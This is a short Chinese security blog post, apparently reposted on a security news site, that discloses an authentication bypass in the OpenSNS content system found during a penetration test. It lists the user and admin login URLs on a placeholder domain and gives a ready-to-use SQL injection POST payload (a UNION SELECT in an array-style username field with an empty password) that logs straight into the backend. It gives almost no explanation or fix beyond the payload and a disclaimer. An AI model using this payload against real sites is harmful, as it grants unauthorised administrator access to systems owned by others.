opensns秒进后台

2019年11月20日23:28:35评论592 views字数 264阅读0分52秒阅读模式

摘要

这个是在给客户做渗透测试的时候发现的。期间感谢雨神powered by opensns 随便日

这个是在给客户做渗透测试的时候发现的。期间感谢雨神

powered by opensns 随便日

秒进后台有2处地方：

一个是普通用户登录，一处后台管理登录(默认)

http://a.com/index.php?s=/ucenter/member/login.html 普通用户登录

http://a.com/index.php?s=/admin/public/login.html 后台登录

playload: POST

username[0]==1 UNION SELECT 1,2,'',4,5,6,7,8,9,10,11,12#IN&password=

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

JavaWeb安全开发

Brup Suite插件分享-Burp_AES_Plugin【AES爆破插件】

Apache Solr stream.url SSRF与任意文件读取漏洞利用

weblogic 越权绕过登录POC(CVE-2020-14882)

[已修复]Alibaba Nacos to 认证ByPass漏洞，可导致RCE

Apache Flink目录遍历漏洞通告(CVE-2020-17518、CVE-2020-17519)

Tomcat WebSocket 拒绝服务漏洞附EXP(CVE-2020-13935)

常见JAVA组件安全-Turning your data into code execution

windows 恢复试用IntelliJ IDEA

2020年10月发布WebLogic多个高危漏洞

本文由 JAVASEC 发表于 2019年11月20日23:28:35
转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出)：
opensns秒进后台https://cn-sec.com/archives/70640.html
免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉.

目录

在线咨询

13688888888

8888 QQ在线咨询

微信
本页二维码